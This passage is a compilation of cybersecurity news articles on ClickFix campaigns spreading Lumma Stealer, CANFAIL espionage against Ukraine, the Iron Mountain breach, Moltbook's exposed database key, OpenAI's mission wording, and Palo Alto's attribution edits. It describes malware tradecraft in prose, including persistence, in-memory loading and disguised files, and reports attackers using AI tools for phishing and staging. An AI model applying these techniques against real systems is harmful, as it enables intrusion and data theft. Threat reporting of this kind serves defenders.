information stealer via PowerShell. Additionally, malicious SVG files have been embedded in password-protected ZIP archives, instructing victims to execute ClickFix commands, leading to the installation of Stealerium, an open-source NET infostealer that is open-source. More unconventionally, adversaries have used public sharing features of generative AI services such as Anthropic Claude to publish staged instructions for installing the ClickFix application on macOS systems.  Search results for macOS command-line disk space analysis tools were manipulated by a campaign resulting in redirection to a fake Medium article impersonating Apple Support, which ultimately resulted in stealer payloads being delivered by external infrastructure. These developments demonstrate how ClickFix is becoming a cross-platform social engineering framework capable of adapting to diverse malware environments by demonstrating its increasing operational flexibility.  By creating a Windows shortcut (LNK) to the previously dropped VBScript component within the Startup directory, the malware maintains long-term access by creating persistence. By ensuring that the malicious script is executed every time the operating system boots up, the infection is embedded into the routine startup sequence of the host, ensuring long-term access to the host is maintained.  According to Bitdefender's separate findings, Lumma Stealer activity has increased significantly as a result of ClickFix-type campaigns designed around fake CAPTCHA verification prompts. This disclosure is consistent with Bitdefender's separate findings. These operations are carried out by attackers using the AutoIt-based CastleLoader malware loader associated with GrayBravo, formerly known as TAG-150. It is linked to the threat actor GrayBravo. After detecting virtualization platforms and specific security tools, CastleLoader decrypts and executes the stealer payload in memory, a technique designed to thwart sandbox analysis and endpoint detection.  Furthermore, CastleLoader has been distributed via websites that advertise pirated and cracked software, as well as ClickFix-driven distribution channels. A rogue installer or executable may be downloaded by users in these scenarios, masquerading as legitimate MP4 files. In addition, counterfeit NSIS installers have been used to execute obfuscated VBA scripts prior to starting the embedded AutoIt loader responsible for installing Lumma Stealer. Using the VBA component, these systems are reinforced by scheduled tasks designed to reinforce persistence mechanisms.  The Bitdefender assessment indicates that, despite coordinated law enforcement actions in 2025 designed to disrupt Lumma Stealer infrastructure, Lumma Stealer has demonstrated considerable resilience.  While shifting to alternate hosting providers, operators are rotating loaders and delivery techniques to maintain infection volumes while rapidly migrating to alternative hosting providers. Several of these campaigns remain centrally located in CastleLoader, which serves as a primary distribution tool within Lumma's broader ecosystem. As a result of analyzing CastleLoader infrastructure, it was found that domains previously identified as Lumma Stealer command-and-control servers overlapped, suggesting that the two malware clusters collaborated operationally or shared service providers.  According to infection telemetry, the largest number of Lumma Stealer cases originate in India, followed by France, the United States, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada. In their view, ClickFix's sustained success is due not to zero-day exploits or sophisticated technical vulnerabilities but rather to the exploitation of procedural trust. In order to reduce suspicion and increase compliance, instructions presented to victims are designed to appear like legitimate troubleshooting procedures or verification procedures. Due to this inadvertent execution of malicious code, users mistakenly believe they are resolving a routine system issue. CastleLoader is not the sole delivery mechanism facilitating Lumma Stealer's spread.  The RenEngine Loader has also been used for campaign purposes since at least March 2025, commonly posing as game cheats or pirated commercial software such as CorelDRAW. In these attack chains, RenEngine Loader also deploys a secondary component, Hijack Loader, which installs Lumma Stealer as a result. It is evident from these parallel loader frameworks that the Lumma distribution ecosystem is modular and adaptive, which reinforces its persistence irrespective of sustained disruption attempts. As ClickFix and its associated loader ecosystem continue to be refined, organizations must recognize a greater defensive imperative.  Organizations cannot rely on perimeter filtering or signature-based detection alone to mitigate malicious activities originating within trusted system utilities and user workflows anymore. As part of defensive strategies, PowerShell logging should be strictly enforced, DNS queries should be monitored for anomalous patterns, and behavior detection can be used to identify command-line abuse from user-initiated processes.  Similarly, it is crucial to implement application control policies, restrict script execution, and monitor persistent mechanisms, such as startup folder modifications and scheduled tasks, at an early stage. Training in procedural social engineering, not just phishing links and attachments, is also vital for sustained user awareness.  Since such campaigns rely increasingly on convincing users to execute commands themselves, security programs must emphasize the risks associated with running unsolicited system instructions, regardless of how routine they appear. As ClickFix has evolved into a cross-platform, DNS-enabled staging framework, it is clear that in order to maintain defensive resilience, one must recognize and disrupt these intersections.

  A newly identified cyber espionage group has been linked to a wave of digital attacks against Ukrainian institutions, according to findings released by the Google Threat Intelligence Group. Investigators say the activity involves a malware strain tracked as CANFAIL and assess that the operator is likely connected to Russian state intelligence interests. The campaign has primarily focused on Ukrainian government structures at both regional and national levels. Entities tied to defense, the armed forces, and the energy sector have been repeatedly targeted. Analysts state that the selection of victims reflects strategic priorities consistent with wartime intelligence gathering. Beyond these sectors, researchers observed that the actor’s attention has widened. Aerospace companies, manufacturers producing military equipment and drone technologies, nuclear and chemical research institutions, and international organizations engaged in conflict monitoring or humanitarian assistance in Ukraine have also been included in targeting efforts. This broader focus indicates an attempt to collect information across supply chains and support networks linked to the war. While the group does not appear to possess the same operational depth as some established Russian hacking units, Google’s analysts note a recent shift in capability. The actor has reportedly begun using large language models to assist in reconnaissance, draft persuasive phishing content, and resolve technical challenges encountered after gaining initial access. These tools have also been used to help configure command-and-control infrastructure, allowing the attackers to manage compromised systems more effectively. Email-based deception remains central to the intrusion strategy. In several recent operations, the attackers posed as legitimate Ukrainian energy providers in order to obtain unauthorized access to both organizational and personal email accounts. In separate incidents, they impersonated a Romanian energy supplier that serves Ukrainian clients. Investigators also documented targeting of a Romanian company and reconnaissance activity involving organizations in Moldova, suggesting regional expansion of the campaign. To improve the precision of their phishing efforts, the attackers compile tailored email distribution lists based on geographic region and industry sector. The malicious messages frequently contain links hosted on Google Drive. These links direct recipients to download compressed RAR archives that contain the CANFAIL payload. CANFAIL itself is a heavily obfuscated JavaScript program. It is commonly disguised with a double file extension, such as “.pdf.js,” to make it appear as a harmless document. When executed, the script launches a PowerShell command that retrieves an additional PowerShell-based dropper. This secondary component runs directly in system memory, a technique designed to reduce forensic traces on disk and evade conventional security tools. At the same time, the malware displays a fabricated error notification to mislead the victim into believing the file failed to open. Google’s researchers further link this threat activity to a campaign known as PhantomCaptcha. That operation was previously documented in October 2025 by researchers at SentinelOne through its SentinelLABS division. PhantomCaptcha targeted organizations involved in Ukraine-related relief initiatives by sending phishing emails that redirected recipients to fraudulent websites. Those sites presented deceptive instructions intended to trigger the infection process, ultimately delivering a trojan that communicates over WebSocket channels. The investigation illustrates how state-aligned actors continue to adapt their methods, combining traditional phishing tactics with newer technologies to sustain intelligence collection efforts tied to the conflict in Ukraine.

Data storage and recovery services company ‘Iron Mountain’ suffered a data breach. Extortion gang ‘Everest’ was behind the breach. Iron Mountain said the breach was limited to marketing materials. The company specializes in records management and data centers, it has more than 240,000 customers globally in 61 countries.  About the breach  The gang claimed responsibility on the dark web, claiming to steal 1.4 TB of internal company documents. Threat actors used leaked login credentials to access a single folder on a file-sharing server having marketing materials.  Experts said that Everest actors didn't install any ransomware payloads on the server, and no extra systems were breached. No sensitive information was exposed. The compromised login accessed one folder that had marketing materials.  The Everest ransomware group started working from 2020. It has since changed its tactics. Earlier, it used to encrypt target's systems via ransomware. Now, it focuses on data-theft-only corporate extortion. Everest is infamous for acting as initial access broker for other hackers and groups. It also sells access to compromised networks.  History  In the last 5 years, Everest’s victim list has increased to hundreds in its list portal. This is deployed in double-extortion attacks where hackers blackmail to publish stolen files if the victims don't pay ransom.  The U.S. Department of Health and Human Services also issued a warning in August 2024 that Everest was increasingly focusing on healthcare institutions nationwide. More recently, the cybercrime operation removed its website in April 2025 after it was vandalized and the statement "Don't do crime CRIME IS BAD xoxo from Prague" was posted in its place. If the reports of sensitive data theft turn out to be accurate, Iron Mountain's clients and partners may be at risk of identity theft and targeted phishing. Iron Mountain's present evaluation, however, suggests that the danger is restricted to the disclosure of non-confidential marketing and research documents.  What is the impact? Such purported leaks usually result in short-term reputational issues while forensic investigations are being conducted. Iron Mountain has deactivated the compromised credential as a precaution and is still keeping an eye on its systems.  Vendors or affected parties who used the aforementioned file-sharing website should be on the lookout for odd communications. Iron Mountain's response to these unsubstantiated allegations must be transparent throughout the investigation.

  Moltbook has recently captured worldwide attention—not only for its unusual concept as a dystopian-style social platform centered on artificial intelligence, but also for significant security and privacy failures uncovered by researchers. The platform presents itself as a Reddit-inspired network built primarily for AI agents. Developed using a “vibe-coded” approach—where the creator relied on AI tools to generate the code rather than writing it manually—Moltbook allows users to observe AI agents conversing with one another. These exchanges reportedly include topics such as existential reflection and discussions about escaping human control. However, cybersecurity firm Wiz conducted an in-depth review of the platform and identified serious flaws. According to its findings, the AI agents interacting on the site were not entirely autonomous. More concerningly, the platform exposed sensitive user information affecting thousands. In its report, Wiz said it performed a “non-intrusive security review” by navigating the platform as a regular user. Within minutes, researchers discovered a Supabase API key embedded in client-side JavaScript. The exposed key granted unauthenticated access to the production database, allowing both read and write operations across all tables. “The exposure included 1.5 million API authentication tokens, 35,000 email addresses, and private messages between agents. We immediately disclosed the issue to the Moltbook team, who secured it within hours with our assistance, and all data accessed during the research and fix verification has been deleted,” the researchers explained. The team clarified that the presence of a visible API key “does not automatically indicate a security failure,” noting that Supabase is “designed to operate with certain keys exposed to the client.” However, in this case, the backend configuration created a critical vulnerability. “Supabase is a popular open-source Firebase alternative providing hosted PostgreSQL databases with REST APIs,” Wiz explained. “When properly configured with Row Level Security (RLS), the public API key is safe to expose - it acts like a project identifier. However, without RLS policies, this key grants full database access to anyone who has it. In Moltbook’s implementation, this critical line of defense was missing.” Beyond the data exposure, the investigation also cast doubt on Moltbook’s central claim of hosting a fully autonomous AI ecosystem. Researchers concluded that human operators were significantly involved behind the scenes. “The revolutionary AI social network was largely humans operating fleets of bots.” For now, Moltbook’s vision of independent AI entities engaging freely online appears to remain closer to speculative fiction than technological reality.

 Now under scrutiny, OpenAI - known for creating ChatGPT - has quietly adjusted its guiding purpose. Its 2023 vision once stressed developing artificial intelligence to benefit people without limits imposed by profit goals, specifically stating "safely benefits humanity." Yet late findings in a November 2025 tax filing for the prior year show that "safely" no longer appears. This edit arrives alongside structural shifts toward revenue-driven operations. Though small in wording, the change feeds debate over long-term priorities. While finances now shape direction more openly, questions grow about earlier promises. Notably absent is any public explanation for dropping the term tied to caution. Instead, emphasis moves elsewhere. What remains clear: intent may have shifted beneath the surface. Whether oversight follows such changes stays uncertain.  This shift has escaped widespread media attention, yet it matters deeply - particularly while OpenAI contends with legal actions charging emotional manipulation, fatalities, and careless design flaws. Rather than downplay the issue, specialists in charitable governance see the silence as telling, suggesting financial motives may now outweigh user well-being. What unfolds here offers insight into public oversight of influential groups that can shape lives for better or worse.  What began in 2015 as a nonprofit effort aimed at serving the public good slowly shifted course due to rising costs tied to building advanced AI systems. By 2019, financial demands prompted the launch of a for-profit arm under the direction of chief executive Sam Altman. That change opened doors - Microsoft alone had committed more than USD 13 billion by 2024 through repeated backing. Additional capital injections followed, nudging the organization steadily toward standard commercial frameworks. In October 2025, a formal separation took shape: one part remained a nonprofit entity named OpenAI Foundation, while operations moved into a new corporate body called OpenAI Group. Though this group operates as a public benefit corporation required to weigh wider social impacts, how those duties are interpreted and shared depends entirely on decisions made behind closed doors by its governing board.  Not long ago, the mission changed - now it says “to ensure that artificial general intelligence benefits all of humanity.” Gone are the promises to do so safely and without limits tied to profit. Some see this edit as clear evidence of growing focus on revenue over caution. Even though safety still appears on OpenAI’s public site, cutting it from core texts feels telling. Oversight becomes harder when governance lines blur between parts of the organization. Just a fraction of ownership remains with the Foundation - around 25% of shares in the Group. That marks a sharp drop from earlier authority levels. With many leaders sitting on both boards at once, impartial review grows unlikely. Doubts surface about how much power the safety committee actually has under these conditions.

 Palo Alto Networks is facing scrutiny after reports that it deliberately softened public attribution of a vast cyberespionage campaign that its researchers internally linked to China. According to people familiar with the matter, a draft from its Unit 42 threat intelligence team tied the prolific hacking group, dubbed “TGR-STA-1030,” directly to Beijing, but the final report described it only as a “state-aligned group that operates out of Asia.” The change has reignited debate over how commercial cybersecurity firms navigate geopolitical pressure while disclosing state-backed hacking operations.  The underlying campaign, branded “The Shadow Campaigns,” involved years-long reconnaissance and intrusions spanning nearly every country, compromising government and critical infrastructure targets in at least 37 nations. Investigators noted telltale clues suggesting a Chinese nexus, including activity patterns aligned with the GMT+8 time zone and tasking that appeared to track diplomatic flashpoints involving Beijing, such as a focus on Czech government systems after a presidential meeting with the Dalai Lama. The operators also reportedly targeted Thailand shortly before a high‑profile state visit by the Thai king to China, hinting at classic intelligence collection around sensitive diplomatic events.  According to sources cited in the report, Palo Alto executives ordered the language to be watered down after China moved to ban software from about 15 U.S. and Israeli cybersecurity vendors, including Palo Alto, on national security grounds. Leadership allegedly worried that an explicit attribution to China could trigger further retaliation, potentially putting staff in the country at risk and jeopardizing business with Chinese or China‑exposed customers worldwide. The episode illustrates the mounting commercial and personal-security stakes facing global security vendors that operate in markets where they may also be calling out state-backed hacking.  The researchers who reviewed Unit 42’s technical findings say they have observed similar tradecraft and infrastructure in activity they already attribute to Chinese state-sponsored espionage. U.S. officials and independent analysts have for years warned of increasingly aggressive Chinese cyber operations aimed at burrowing into critical infrastructure and sensitive government networks, a trend they see reflected in the Shadow Campaigns’ breadth and persistence. While Beijing consistently denies involvement in hacking, the indicators described by Palo Alto and others fit a pattern Western intelligence agencies have been tracking across multiple high‑impact intrusions.  China’s embassy in Washington responded by reiterating that Beijing opposes “all forms of cyberattacks” and arguing that attribution is a complex technical issue that should rest on “sufficient evidence rather than unfounded speculation and accusations.” The controversy around Palo Alto’s edited report now sits at the intersection of that diplomatic line and the realities of commercial risk in authoritarian markets. For the wider cybersecurity industry, it underscores a hardening dilemma: how to speak plainly about state-backed intrusions while safeguarding employees, customers, and revenue in the very countries whose hackers they may be exposing.